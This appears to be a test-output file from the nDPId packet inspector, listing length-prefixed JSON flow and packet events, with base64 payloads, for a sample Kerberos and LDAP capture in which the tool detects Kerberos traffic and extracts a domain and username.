+00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="} +00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="} +00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} +00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} +00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="} +00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00906{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1549337952273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":384,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":384,"pkt_l4_len":350,"thread_ts_msec":1549337952273,"pkt":"pB9ywglqAAgCHEeuCABFAAFyATpAAIAGj1qsEAjJrBAICMApAYWiDvrzQ6ao6FAYAQCdKwAA2XkxbZ8llDCRRskO9gczLnFPBBStfBeg8OgSpqEBOAYdhyM5RDqy\/NVC6gFAjMdVRNF4Ud\/vkuMZvi\/C9TPqJBllB8ilyB5vY\/0m8yd5y16xkjvnwbrb\/W3CqgNY3GxQ0p18n9KBChjcbfQi2adBQLNadPsG91L4HVVYSlDxeVsaDj0AMrkXgx+K3pVveifu4IJvdTmm3dssrOx7ri4BqxH9gyHnnJM+gUu5MIG+gLCwhKX1IYuuZbwXmnO9knNSHi2TJaHys\/IKitqKHwvZMTG4i5pUecWz9NSU996q6A\/\/cM86g4TCvpD7370UyqGGHaccTUUMvb5qsoRczG++plTQXQ5YE69in6j\/JeD8IrT\/3QjjRWw+cBkDPh5zGLRzdI7hQfeBq0OXmrV0OXPvzg6Pl4TznRF\/D32Q4zoFws9t5i+mUoUZd\/0N"} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952274,"pkt":"AAgCHEeupB9ywglqCABFAAD6FAFAAIAGfQusEAgIrBAIyQGFwClDpqjoog78PVAYAQACfgAAMIQAAADMAgETYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1lU8qvBSW6OfUooizc58b3UUWb1Dc9+q1BnNlk6M5gNl0OBLUYfNGeTN7jVmkr5YZr3HGFOATkbw9DVEo286mQ0yhq4w+ZVjlShGexAg6l9M9U7cWsZU11Tj+uS9vWEh6ZGrVD7TgBU6qOlGAU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952280,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952280,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1549337952280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952280,"pkt":"pB9ywglqAAgCHEeuCABFAADxAURAAIAGj9GsEAjJrBAICMArAFh+ue0Nm8k31FAYAQCDOwAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbhyIagSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYjkLV5w61M4dBZf0U0Cc\/K54wTCl69GxhAdEJKI0gkw0Ve5ZSvbl+6jcyFmUgFhA4RyBx9pGsk\/XqrLuUXPEHyz9XOfuzdWYBvPp5yv4UFPIJKI5TMk\/2fkioL\/XfCG7Jr8xEeBwNw3Qk0PtCp3\/DDaU5\/NbtOzNRQiyiFTx75LpVnwmoKHd6R7"} 